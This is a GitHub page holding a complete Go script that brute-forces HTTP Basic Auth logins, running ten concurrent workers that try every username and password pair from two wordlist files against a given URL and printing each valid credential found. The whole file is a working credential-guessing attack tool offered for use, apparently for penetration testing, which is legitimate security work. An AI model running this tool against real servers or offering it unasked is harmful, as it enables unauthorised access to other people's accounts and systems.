scripts-averagesecurityguy/brute_http_basic.go at master · mcjon3z/scripts-averagesecurityguy · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
/*
Copyright (c) 2017, AverageSecurityGuy
# All rights reserved.

Simple Go script to test a username and password list against an HTTP Basic
Auth server. Example usage and output:

$ ./brute_http_basic https://httpbin.org/basic-auth/test/test test words.txt
https://httpbin.org/basic-auth/test/test - test:test
*/

package main

import (
    "os"
    "fmt"
    "sync"
    "net/http"
    "bufio"
    "strings"
)


type Cred struct {
    User string
    Pass string
}


func print_line(msg string) {
    fmt.Printf("[*] %s\n", msg)
}


func print_good(msg string) {
    fmt.Printf("[+] %s\n", msg)
}


func print_error(msg string) {
    fmt.Printf("[E] %s\n", msg)
}


func open(filename string) *os.File {
    /*
    Open a file as read only.
    */
    data, err := os.Open(filename)
    if err != nil {
        print_error(err.Error())
    }

    return data
}


func basicAuth(url, username, password string) {
    /*
    Send an HTTP Basic Auth request with the given username and password.
    */
    client := &http.Client{}

    req, err := http.NewRequest("GET", url, nil)
    req.SetBasicAuth(username, password)

    resp, err := client.Do(req)

    if err != nil {
        print_error(err.Error())
    } else if resp.StatusCode == 401 {
        // print_error(fmt.Sprintf("Invalid: %s:%s", username, password))
    } else {
        print_good(fmt.Sprintf("Valid: %s:%s\n", username, password))
    }
}


func main() {
    if len(os.Args) != 4 {
        fmt.Println("Usage: brute_http_basic url user_file pass_file")
        os.Exit(1)
    }

    url := os.Args[1]
    user_file := os.Args[2]
    pass_file := os.Args[3]
    threads := 10

    // Open our username and password lists.
    print_line(fmt.Sprintf("Opening username file: %s", user_file))
    users := open(user_file)

    print_line(fmt.Sprintf("Opening password file: %s", pass_file))
    pwds := open(pass_file)

    // Create Channels
    credChan := make(chan Cred, threads)
    processorGroup := new(sync.WaitGroup)
    processorGroup.Add(threads)

    // Create Threads
    for i := 0; i < threads; i++ {
        go func() {
            for {
                cred, ok := <- credChan

                if ok {
                    basicAuth(url, cred.User, cred.Pass)
                } else {
                    break
                }
            }

            processorGroup.Done()
        }()
    }

    print_line("Building credentials.")
    uscan := bufio.NewScanner(users)

    for uscan.Scan() {
        user := uscan.Text()

        if strings.HasPrefix(user, "#") == true {
            continue
        }

        pscan := bufio.NewScanner(pwds)

        for pscan.Scan() {
            pass := pscan.Text()

            if strings.HasPrefix(pass, "#") == true {
                continue
            }

            credChan <- Cred{user, pass}
        }

        // Reset the password file so we can rescan it for the next user.
        pwds.Seek(0, 0)
    }

    defer users.Close()
    defer pwds.Close()

    close(credChan)
    processorGroup.Wait()
}